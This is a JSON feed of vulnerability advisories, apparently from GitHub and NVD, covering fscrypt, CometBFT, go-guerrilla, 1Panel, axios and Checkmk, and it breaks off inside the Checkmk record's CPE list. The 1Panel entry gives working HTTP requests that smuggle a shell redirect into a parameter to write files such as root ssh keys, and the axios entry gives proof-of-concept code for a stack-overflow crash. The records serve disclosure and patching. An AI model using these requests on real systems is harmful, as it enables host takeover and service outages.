[{"schema_version": "1.4.0", "id": "GHSA-p93v-m2r2-4387", "modified": "2026-06-08T16:00:33Z", "published": "2022-03-01T21:05:01Z", "aliases": [], "summary": "Denial of service via insufficient metadata validation", "details": "The PAM module for `fscrypt` through v0.3.2 doesn't adequately validate `fscrypt` metadata files, allowing users to create malicious metadata files that prevent other users from logging in. A local user can cause a denial of service by creating a `fscrypt` metadata file that prevents other users from logging into the system. We recommend upgrading to v0.3.3 or above.\n\nFor more details, see [CVE-2022-25327](https://www.cve.org/CVERecord?id=CVE-2022-25327).", "severity": [], "affected": [{"package": {"ecosystem": "Go", "name": "github.com/google/fscrypt"}, "ranges": [{"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "0.3.3"}]}]}], "references": [{"type": "WEB", "url": "https://github.com/google/fscrypt/security/advisories/GHSA-p93v-m2r2-4387"}, {"type": "WEB", "url": "https://github.com/google/fscrypt/commit/91aa3ebf42032ca783c41f9ec25d885875f66ddb"}, {"type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2022-0340"}, {"type": "PACKAGE", "url": "github.com/google/fscrypt"}], "database_specific": {"cwe_ids": [], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2022-03-01T21:05:01Z", "nvd_published_at": null}, "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "ghsa-p93v-m2r2-4387"}]}}}, {"schema_version": "1.4.0", "id": "GHSA-p7mv-53f2-4cwj", "modified": "2026-06-08T15:58:52Z", "published": "2024-11-06T15:33:55Z", "aliases": [], "summary": "CometBFT Vote Extensions: Panic when receiving a Pre-commit with an invalid data", "details": "Name: ASA-2024-011: Vote Extensions: Panic when receiving a Pre-commit with an invalid data\nComponent: CometBFT\nCriticality: High (Considerable Impact, and Possible Likelihood per [ACMv1.2](https://github.com/interchainio/security/blob/main/resources/CLASSIFICATION_MATRIX.md))\nAffected versions: `>= 0.38.x`, unreleased `v1.x` and `main` development branches\nAffected users: Chain Builders + Maintainers, Validators\n\n### Impact\n\nA CometBFT node running in a network with [vote extensions][abci-spec] enabled could produce an invalid `Vote` message and send it to its peers. The invalid field of the `Vote` message is the `ValidatorIndex`, which identifies the sender in the `ValidatorSet` running that height of consensus. This field is ordinarily verified in the processing of `Vote` messages, but it turns out that in the case of a `Vote` message of type `Precommit` and for a non-`nil` `BlockID`, [a logic was introduced](https://github.com/cometbft/cometbft/blame/46621a87064b2ae235e122e66d9b22417b3aa35e/internal/consensus/state.go#L2357-L2364) before this ordinary verification to handle the attached vote extension. This introduced logic (not present in releases prior to `0.38.x`) does not double-check the validity of the `ValidatorIndex` field. The result is a panic in the execution of the node receiving and processing such message.\n\n#### Impact Qualification\nThis condition requires the introduction of malicious code in the full node sending this `Vote` message to its peers. Namely, nodes running upstream code cannot produce invalid `Vote` messages, with non-existing `ValidatorIndex`. Moreover, networks utilizing default behavior, where vote extensions are not enabled, are not affected by this issue.\n\n### Patches\n\nThe new CometBFT release [`v0.38.15`][v0.38.15] fixes this issue.\n\nUnreleased code in the `main` and `v1.x` branches, and experimental code in the `v0.38-experimental` and `v1.x-experimental` branches are patched as well.\n\n### Workarounds\n\nWhen the consensus code panics after receiving an invalid `Vote` message, the operator can identify the peer from which that message was received. This may require increasing the logging level of the `consensus` module. This peer can then be subsequently banned at the p2p layer as a temporary mitigation.  \n\n### References\n\n- [ABCI spec][abci-spec], in particular the operation of vote extensions\n- [Patched v0.38 release][v0.38.15]\n\n[abci-spec]: https://docs.cometbft.com/v0.38/spec/abci/abci++_basic_concepts\n[v0.38.15]: https://github.com/cometbft/cometbft/releases/tag/v0.38.15\n\n### Timeline\n\n* October 21, 2024, 3:26pm PST: Issue reported to the Cosmos Bug Bounty program\n* October 21, 2024, 3:41pm PST: Issue triaged by Amulet on-call, and distributed to Core team\n* October 29, 2024, 11:35pm PST: Core team completes validation of issue\n* October 30, 2024, 3:33am PST: Core team completes patch for issue\n* October 30, 2024, 5:09am PST: Amulet creates coordination plan; schedule for distribution\n* November 4, 2024, 8:00pm GMT: Pre-notification delivered\n* November 6, 2024, 8:00am GMT: Patch made available\n\n\nThis issue was reported by [corverroos](https://github.com/corverroos) to the Cosmos Bug Bounty Program on HackerOne on October 21, 2024. If you believe you have found a bug in the Interchain Stack or would like to contribute to the program by reporting a bug, please see https://hackerone.com/cosmos.\n\nIf you have questions about Interchain security efforts, please reach out to our official communication channel at [security@interchain.io](mailto:security@interchain.io).  For more information about the Interchain Foundation\u2019s engagement with Amulet, and to sign up for security notification emails, please see https://github.com/interchainio/security.  \n\nA Github Security Advisory for this issue is available in the CometBFT [repository](https://github.com/cometbft/cometbft/security/advisories/GHSA-p7mv-53f2-4cwj). For more information about CometBFT, see https://docs.cometbft.com/.", "severity": [{"type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"}], "affected": [{"package": {"ecosystem": "Go", "name": "github.com/cometbft/cometbft"}, "ranges": [{"type": "ECOSYSTEM", "events": [{"introduced": "0.38.0"}, {"fixed": "0.38.15"}]}]}], "references": [{"type": "WEB", "url": "https://github.com/cometbft/cometbft/security/advisories/GHSA-p7mv-53f2-4cwj"}, {"type": "WEB", "url": "https://github.com/cometbft/cometbft/commit/17d3bb66664cab6d6798c17e27198e15bbac1905"}, {"type": "WEB", "url": "https://docs.cometbft.com/v0.38/spec/abci/abci++_basic_concepts"}, {"type": "PACKAGE", "url": "https://github.com/cometbft/cometbft"}, {"type": "WEB", "url": "https://github.com/cometbft/cometbft/releases/tag/v0.38.15"}, {"type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2024-3259"}], "database_specific": {"cwe_ids": ["CWE-129"], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-11-06T15:33:55Z", "nvd_published_at": null}, "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "ghsa-p7mv-53f2-4cwj"}]}}}, {"schema_version": "1.4.0", "id": "GHSA-c2c3-pqw5-5p7c", "modified": "2026-06-08T15:57:50Z", "published": "2025-04-01T22:23:49Z", "aliases": ["CVE-2025-31135"], "summary": "Go-Guerrilla SMTP Daemon allows the PROXY command to be sent multiple times", "details": "### Summary\n\nThe PROXY command is accepted multiple times, allowing a client to spoof its IP address when the proxy protocol is being used.\n\n### Details\n\nWhen ProxyOn is enabled, [it looks like the PROXY command will be accepted multiple times](https://github.com/phires/go-guerrilla/blob/fca3b2d8957a746997c7e71fca39004f5c96e91f/server.go#L495), with later invocations overriding earlier ones.  The proxy protocol only supports one initial PROXY header; anything after that is considered part of the exchange between client and server, so the client is free to send further PROXY commands with whatever data it pleases.  go-guerrilla will treat these as coming from the reverse proxy, allowing a client to spoof its IP address.\n\nNote that the format of the PROXY header is [well-defined](https://www.haproxy.org/download/1.8/doc/proxy-protocol.txt).  It probably shouldn't be treated as an SMTP command; parsing it the same way is likely to result in odd behavior and could lead to other vulnerabilities.\n\n### PoC\n\nI'm working on writing a PR to fix this vulnerability.  It'll include a unit test that will serve as a PoC on the current version.\n\n### Impact\n\nAny instance with `ProxyOn` enabled (`proxyon` in the JSON config) is affected.\n\nAs far as I'm able to tell, the impact is limited to spoofing the `RemoteIP` field.  This isn't ideal, but it probably has less practical impact on an MTA than, say, a web server.", "severity": [{"type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"}], "affected": [{"package": {"ecosystem": "Go", "name": "github.com/phires/go-guerrilla"}, "ranges": [{"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "1.6.7"}]}]}], "references": [{"type": "WEB", "url": "https://github.com/phires/go-guerrilla/security/advisories/GHSA-c2c3-pqw5-5p7c"}, {"type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-31135"}, {"type": "WEB", "url": "https://github.com/phires/go-guerrilla/commit/7673947f2d5204a135d7ae0b7f80759e548abee6"}, {"type": "PACKAGE", "url": "https://github.com/phires/go-guerrilla"}, {"type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2025-3588"}], "database_specific": {"cwe_ids": ["CWE-20"], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2025-04-01T22:23:49Z", "nvd_published_at": "2025-04-01T22:15:21Z"}, "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "ghsa-c2c3-pqw5-5p7c"}]}}}, {"schema_version": "1.4.0", "id": "GHSA-f8ch-w75v-c847", "modified": "2026-06-08T15:55:34Z", "published": "2024-05-09T15:14:24Z", "aliases": ["CVE-2024-34352"], "summary": "1Panel arbitrary file write vulnerability", "details": "### Summary\nThere are many command injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs.\nWe can use the following mirror configuration write symbol `>` to achieve arbitrary file writing\n\n### PoC\nDockerfile\n```\nFROM bash:latest\n\nCOPY echo.sh /usr/local/bin/echo.sh\nRUN chmod +x /usr/local/bin/echo.sh\nCMD [\"echo.sh\"]\n```\necho.sh\n```\n#!/usr/local/bin/bash\necho \"Hello, World!\"\n```\nBuild this image like this, upload it to dockerhub, and then 1panel pulls the image to build the container\nSend the following packet, taking care to change the containerID to the malicious container we constructed\n\n```\nGET /api/v1/containers/search/log?container=6e6308cb8e4734856189b65b3ce2d13a69e87d2717898d120dac23b13b6f1377%3E%2Ftmp%2F1&since=all&tail=100&follow=true HTTP/1.1\nHost: xxxx:42713\nConnection: Upgrade\nPragma: no-cache\nCache-Control: no-cache\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36\nUpgrade: websocket\nOrigin: http://xxx:42713\nSec-WebSocket-Version: 13\nAccept-Encoding: gzip, deflate, br\nAccept-Language: zh-CN,zh;q=0.9\nCookie: psession=88e51389-ddce-468c-a3be-51c5b2cb2d9d\nSec-WebSocket-Key: FdXBKFviqO4+LSEoucITLA==\n```\nThen you can write any customized file to, for example, a ssh key, and generally the application is run with root privileges\n```\nGET /api/v1/containers/search/log?container=6e6308cb8e4734856189b65b3ce2d13a69e87d2717898d120dac23b13b6f1377%3E%2Froot%2F.ssh%2f1&since=all&tail=100&follow=true HTTP/1.1\nHost: xxx:42713\nConnection: Upgrade\nPragma: no-cache\nCache-Control: no-cache\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36\nUpgrade: websocket\nOrigin: http://xxx:42713\nSec-WebSocket-Version: 13\nAccept-Encoding: gzip, deflate, br\nAccept-Language: zh-CN,zh;q=0.9\nCookie: psession=88e51389-ddce-468c-a3be-51c5b2cb2d9d\nSec-WebSocket-Key: FdXBKFviqO4+LSEoucITLA==\n```\nOr write a timed task to execute any command.\n### Impact\nThe ability to write arbitrary files on the host where the service is deployed can lead to a host takeover", "severity": [{"type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"}], "affected": [{"package": {"ecosystem": "Go", "name": "github.com/1Panel-dev/1Panel"}, "ranges": [{"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "1.10.3-lts"}]}]}], "references": [{"type": "WEB", "url": "https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847"}, {"type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34352"}, {"type": "WEB", "url": "https://github.com/1Panel-dev/1Panel/commit/e037b69f52799e110af8e98f39a3627ad0285ea6"}, {"type": "PACKAGE", "url": "https://github.com/1Panel-dev/1Panel"}, {"type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2024-2830"}], "database_specific": {"cwe_ids": ["CWE-77"], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2024-05-09T15:14:24Z", "nvd_published_at": "2024-05-14T15:38:43Z"}, "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "ghsa-f8ch-w75v-c847"}]}}}, {"schema_version": "1.4.0", "id": "GHSA-62hf-57xw-28j9", "modified": "2026-06-08T15:54:28Z", "published": "2026-05-05T00:34:32Z", "aliases": ["CVE-2026-42039"], "summary": "Axios: unbounded recursion in toFormData causes DoS via deeply nested request data", "details": "### Summary\ntoFormData recursively walks nested objects with no depth limit, so a deeply nested value passed as request data crashes the Node.js process with a RangeError.\n\n### Details\nlib/helpers/toFormData.js:210 defines an inner `build(value, path)` that recurses into every object/array child (line 225: `build(el, path ? path.concat(key) : [key])`). The only safeguard is a `stack` array used to detect circular references; there is no maximum depth and no try/catch around the recursion. Because `build` calls itself once per nesting level, a payload nested roughly 2000+ levels deep exhausts V8's call stack.\n\n`toFormData` is the serializer behind `FormData` request bodies and `AxiosURLSearchParams` (used by `buildURL` when `params` is an object with `URLSearchParams` unavailable, see `lib/helpers/buildURL.js:53` and `lib/helpers/AxiosURLSearchParams.js:36`). Any server-side code that forwards a client-supplied object into `axios({ data, params })` therefore reaches the recursive walker with attacker-controlled depth.\n\nThe RangeError is thrown synchronously from inside `forEach`, escapes `toFormData`, and propagates out of the axios request call. In typical Express/Fastify request handlers this terminates the running request; in synchronous startup paths or worker threads it can crash the whole process.\n\n### PoC\n```js\nimport toFormData from 'axios/lib/helpers/toFormData.js';\nimport FormData from 'form-data';\n\nfunction nest(depth) {\n  let o = { leaf: 1 };\n  for (let i = 0; i < depth; i++) o = { a: o };\n  return o;\n}\n\ntry {\n  toFormData(nest(2500), new FormData());\n} catch (e) {\n  console.log(e.name + ': ' + e.message);\n}\n// RangeError: Maximum call stack size exceeded\n```\n\nServer-side reachability example:\n```js\n// vulnerable proxy pattern\napp.post('/forward', async (req, res) => {\n  await axios.post('https://upstream/api', req.body); // req.body user-controlled\n  res.send('ok');\n});\n// attacker POST /forward with {\"a\":{\"a\":{\"a\":... 2500 deep ...}}}\n// -> toFormData build() overflows -> request handler crashes\n```\n\nVerified on axios 1.15.0 (latest, 2026-04-10), Node.js 20, 3/3 PoC runs reproduce the RangeError at depth 2500.\n\n### Impact\nA remote, unauthenticated attacker who can influence an object passed to axios as request `data` or `params` triggers an uncaught RangeError inside the synchronous recursive walker. In server-side applications that proxy or re-send client JSON through axios this crashes the request handler and, in worker/cluster setups, the process. Fix by bounding recursion depth in `toFormData`'s `build` function (reject or throw on depths beyond a configurable limit, e.g. 100) or rewriting the walker iteratively.", "severity": [{"type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, {"type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"}], "affected": [{"package": {"ecosystem": "npm", "name": "axios"}, "ranges": [{"type": "ECOSYSTEM", "events": [{"introduced": "1.0.0"}, {"fixed": "1.15.1"}]}]}, {"package": {"ecosystem": "npm", "name": "axios"}, "ranges": [{"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "0.31.1"}]}], "database_specific": {"last_known_affected_version_range": "<= 0.31.0"}}], "references": [{"type": "WEB", "url": "https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9"}, {"type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42039"}, {"type": "WEB", "url": "https://github.com/axios/axios/commit/85132ffba1a77609ea5d101c8a413dea7174932f"}, {"type": "PACKAGE", "url": "https://github.com/axios/axios"}, {"type": "WEB", "url": "https://github.com/axios/axios/releases/tag/v1.15.1"}], "database_specific": {"cwe_ids": ["CWE-674"], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-05-05T00:34:32Z", "nvd_published_at": "2026-04-24T18:16:30Z"}, "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "ghsa-62hf-57xw-28j9"}]}}}, {"id": "CVE-2026-8078", "sourceIdentifier": "security@checkmk.com", "published": "2026-06-08T13:16:33.760", "lastModified": "2026-06-08T15:53:41.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Stored cross-site scripting in the global settings change log in Checkmk <2.5.0p5, <2.4.0p31, <2.3.0p48, and all 2.2.0 versions allows an administrator who can change global settings to store malicious HTML or JavaScript in changelog messages that executes in other users' browsers when they view the Activate Changes page or Audit log."}], "metrics": {"cvssMetricV40": [{"source": "security@checkmk.com", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "nvd@nist.gov", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "security@checkmk.com", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:-:*:*:*:*:*:*", "matchCriteriaId": "C66704F1-0B5E-4B43-8748-987022F378F8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b1:*:*:*:*:*:*", "matchCriteriaId": "B068974F-6F67-4CBB-B567-FCED86E28F22"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b2:*:*:*:*:*:*", "matchCriteriaId": "EA70F36A-EEF6-48DC-B15E-055D0DE8A052"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b3:*:*:*:*:*:*", "matchCriteriaId": "B2017F38-38DB-4E96-B34F-160BC731CBBE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b4:*:*:*:*:*:*", "matchCriteriaId": "0949F399-371B-409C-AF9F-32690D881440"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b5:*:*:*:*:*:*", "matchCriteriaId": "42E1E31A-B5CC-45F2-A2E5-3EEF735499BA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b6:*:*:*:*:*:*", "matchCriteriaId": "4B364FCA-500C-458E-B997-82CD0B1D24F9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b7:*:*:*:*:*:*", "matchCriteriaId": "0B32E657-917B-482B-B6A4-3D3746992A4F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b8:*:*:*:*:*:*", "matchCriteriaId": "2119C732-E024-4DA6-8E47-9E08E5E12602"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:i1:*:*:*:*:*:*", "matchCriteriaId": "4F0B99A8-A124-43BD-B8AA-EECC9112346F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p1:*:*:*:*:*:*", "matchCriteriaId": "3FB7221E-BE9F-4529-8E07-8AD547FA3208"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p10:*:*:*:*:*:*", "matchCriteriaId": "30A074AD-9499-46E3-AB67-D6CEE3AA01C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p11:*:*:*:*:*:*", "matchCriteriaId": "A8BD0240-A22B-4273-BD47-C35A8C12E127"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p12:*:*:*:*:*:*", "matchCriteriaId": "DAA5680F-1DD0-48AA-BB7F-15B27365F0FA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p13:*:*:*:*:*:*", "matchCriteriaId": "BC2F31CA-D4EB-44E6-9A09-5255D33F4A88"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p14:*:*:*:*:*:*", "matchCriteriaId": "CD80BD69-20C6-4E17-B165-98689179A5A1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p15:*:*:*:*:*:*", "matchCriteriaId": "B044D43B-0233-4A0D-A356-B9F9324E2777"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p16:*:*:*:*:*:*", "matchCriteriaId": "7DE79896-EBE5-42F2-A126-2A871BBA1071"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p17:*:*:*:*:*:*", "matchCriteriaId": "51A44E69-EEA1-4B01-B7B3-5BF7B39819E3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p18:*:*:*:*:*:*", "matchCriteriaId": "BCB65AEB-CF52-410B-92B1-2DCFB914FFA4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p19:*:*:*:*:*:*", "matchCriteriaId": "B7E17FA6-9011-489C-9FA9-368CA2D86FAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p2:*:*:*:*:*:*", "matchCriteriaId": "7BCEB6FF-668F-4313-9264-0BF021AFC45F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p20:*:*:*:*:*:*", "matchCriteriaId": "F8B27218-A4FF-47BE-B578-6DB704478921"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p21:*:*:*:*:*:*", "matchCriteriaId": "8735357F-16A7-4408-9DDD-1C6796BADBE9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p22:*:*:*:*:*:*", "matchCriteriaId": "4505098C-0A2B-481E-A3DF-D6DF8EFA4DE7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p23:*:*:*:*:*:*", "matchCriteriaId": "C12AFCCF-014E-4EEB-8F04-F1ACE182BA98"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p24:*:*:*:*:*:*", "matchCriteriaId": "66B85557-D5EC-4AF4-B97A-D2B80A58B3B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p25:*:*:*:*:*:*", "matchCriteriaId": "233ECD21-FA72-43AF-8E4C-DAC27CC18F3C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p26:*:*:*:*:*:*", "matchCriteriaId": "8B4DB8EE-C10A-4097-8E66-2932BAEB732E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p27:*:*:*:*:*:*", "matchCriteriaId": "8653402A-C5AA-4CB1-8742-A12CCBE59373"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p28:*:*:*:*:*:*", "matchCriteriaId": "77047A82-E6D5-4E84-9BEC-ACD2FDA91FAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p29:*:*:*:*:*:*", "matchCriteriaId": "2E44AE62-1746-410F-A28E-F8292E1F8D68"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p3:*:*:*:*:*:*", "matchCriteriaId": "E2342E2D-58B0-43E7-8C01-DF4678520F39"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p30:*:*:*:*:*:*", "matchCriteriaId": "B6C1AC39-5AE0-4FC8-93FF-966400B074F0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p31:*:*:*:*:*:*", "matchCriteriaId": "68455233-52CD-44B8-8B02-D94BA84DA6A8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p32:*:*:*:*:*:*", "matchCriteriaId": "1C95A313-7665-4877-B421-0D20E3D3D54D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p33:*:*:*:*:*:*", "matchCriteriaId": "0AEF278D-D782-4A2B-B1B8-19A21D151AA2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p34:*:*:*:*:*:*", "matchCriteriaId": "B027FE8B-1802-4449-A0CB-6D15F9634559"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p35:*:*:*:*:*:*", "matchCriteriaId": "9B2BC55F-17AE-4BC4-824D-06BE9B15516C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p36:*:*:*:*:*:*", "matchCriteriaId": "1393F094-2D75-44CC-8783-4FDC7450D38E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p37:*:*:*:*:*:*", "matchCriteriaId": "C1294EAE-5CB5-422F-B4C6-3A81B06DE49A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p38:*:*:*:*:*:*", "matchCriteriaId": "2A347A18-7C59-40F5-8CBA-9F9A18B1E105"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p39:*:*:*:*:*:*", "matchCriteriaId": "442780BC-F984-47A3-9F5F-9A5049531C34"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p4:*:*:*:*:*:*", "matchCriteriaId": "1871B646-CA69-477F-B113-B901AC7B3934"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p40:*:*:*:*:*:*", "matchCriteriaId": "768541E6-C94D-4B32-9144-18D81A1AE047"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p41:*:*:*:*:*:*", "matchCriteriaId": "00793C7E-5C20-4696-B829-804CFA8690B5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p42:*:*:*:*:*:*", "matchCriteriaId": "C03BBDDF-F96F-4A36-A7F5-7102A31EC606"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p43:*:*:*:*:*:*", "matchCriteriaId": "92088ED6-F6A8-400A-B015-4F4E02D55ABC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p44:*:*:*:*:*:*", "matchCriteriaId": "AE5F4DD6-9473-4581-BD0E-1D916A7FEF85"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p45:*:*:*:*:*:*", "matchCriteriaId": "6541E323-356B-4B9F-B646-950400122EB3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p46:*:*:*:*:*:*", "matchCriteriaId": "8FC315A6-9110-4302-A0B9-D88B4575852E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p47:*:*:*:*:*:*", "matchCriteriaId": "331CD0EE-E519-4C9C-9124-C35EE12B5FF8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p5:*:*:*:*:*:*", "matchCriteriaId": "EEC65A72-CAE1-4E28-83EF-7ECAFE921BB6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p6:*:*:*:*:*:*", "matchCriteriaId": "D8FDECBC-8213-495F-A932-C4310F7C1F87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p7:*:*:*:*:*:*", "matchCriteriaId": "CB49BC95-6AA8-4F53-A3D6-E199BF756AAF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p8:*:*:*:*:*:*", 